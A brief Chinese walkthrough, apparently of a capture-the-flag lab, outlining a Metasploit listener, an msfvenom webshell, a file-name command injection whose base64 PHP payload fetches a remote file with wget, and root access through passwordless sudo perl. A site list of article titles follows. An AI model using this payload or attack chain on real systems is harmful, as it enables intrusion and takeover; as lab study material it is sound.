开门见山

1. 启动metasploit

2. 设置参数参数选项

3. 查看最后设置后的结果

4. 启动监听

5. 使用msfvemon制作webshell

6. 开启apache服务

7. 使用bash64对命令进行加密,为此绕过防火墙

8. 通过burpsuite抓包改包上传,把文件名改为命令执行

<?php system(base64_decode('d2dldCBodHRwOi8vMTkyLjE2OC4zMS45NC9zIC1PIC90bXAvYQo='));die();?>.php

9. 监听端收到反馈

10. 查看靶机信息

11. 通过shell查看靶机登陆用户的权限

12. 查看sudo的权限内容,发现一个/usr/bin/perl不需要密码,提升为root权限

13. 查找flag文件,并查看它

最新文章

  1. VS2013中Python学习笔记[Django Web的第一个网页]
  2. 立体视觉-opencv中立体匹配相关代码
  3. Android开发艺术探索(一)——Activity的生命周期和启动模式
  4. [caffe]深度学习之图像分类模型AlexNet解读
  5. [译]SSRS 报表版本控制
  6. mysql数据库修改数据库编码,字段编码与表编码(转) good
  7. WPF 设置WebBrowser控件不弹脚本错误提示框
  8. MySQL千万级多表关联SQL语句调优
  9. PHP获取字符串编码与转码
  10. type=&quot;submit&quot; button的用法
  11. 【CJOJ P2110】YL杯超级篮球赛
  12. Shell 读取用户输入
  13. Numpy库的学习(一)
  14. VB批量替换文本字符
  15. event.target解析
  16. huffman编解码英文文本[Python]
  17. 提一下InfoQ
  18. P1357 花园
  19. 豆瓣电影 Top 250
  20. Java实验报告(实验二)

热门文章

  1. [Android]如何导入已有的外部数据库
  2. PHPExcel方法总结
  3. List&lt;string&gt;绑定到DataGridView控件
  4. java注解——内置注解和四种元注解
  5. flower——知识总结
  6. Jmeter安装插件Stepping Thread Group
  7. C++输入问题探究
  8. LocalDateTime整合到SpringBoot + MyBatis中
  9. scala安装教程及简单配置
  10. 084-PHP文件引用include